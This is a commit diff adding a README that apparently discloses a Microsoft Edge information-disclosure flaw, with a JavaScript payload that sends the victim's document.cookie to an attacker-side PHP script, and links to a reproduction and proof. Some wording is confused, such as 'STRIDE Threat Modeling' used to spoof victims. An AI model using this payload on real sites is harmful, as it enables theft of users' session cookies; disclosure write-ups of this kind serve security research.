Update README.MD
This commit is contained in:
parent
56510088d9
commit
65ec448031
1 changed files with 34 additions and 0 deletions
|
|
@ -3,3 +3,37 @@
|
|||
## [Vendor](https://www.microsoft.com/en-us/edge?form=MY01BV&exp=e414)
|
||||
|
||||

|
||||
|
||||
## Description:
|
||||
The type of information that could be disclosed if an attacker successfully exploited this vulnerability is data inside the targeted website like IDs, tokens, nonces, cookies, IP, User-Agent, and other sensitive information.
|
||||
The user would have to click on a specially crafted URL to be compromised by the attacker.
|
||||
In this example, the attacker use STRIDE Threat Modeling to spoof the victim to click on his website and done.
|
||||
This will be hard to detect.
|
||||
|
||||
## Conclusion:
|
||||
Please be careful, for suspicious sites or be careful who sending you an link to open!
|
||||
|
||||
## Staus: HIGH Vulnerability
|
||||
|
||||
[+]Exploit:
|
||||
|
||||
- Exploit Server:
|
||||
|
||||
```js
|
||||
## This is a Get request from the server when the victims click! And it is enough to understand this vulnerability! =)
|
||||
|
||||
<script> var i = new Image(); i.src="PoCsess.php?cookie="+escape(document.cookie)</script>
|
||||
|
||||
## WARNING: The PoCsess.php will be not uploaded for security reasons!
|
||||
## BR nu11secur1ty
|
||||
|
||||
```
|
||||
|
||||
## Reproduce:
|
||||
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)
|
||||
|
||||
## Proof and Exploit
|
||||
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)
|
||||
|
||||
## Time spend:
|
||||
01:30:00
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue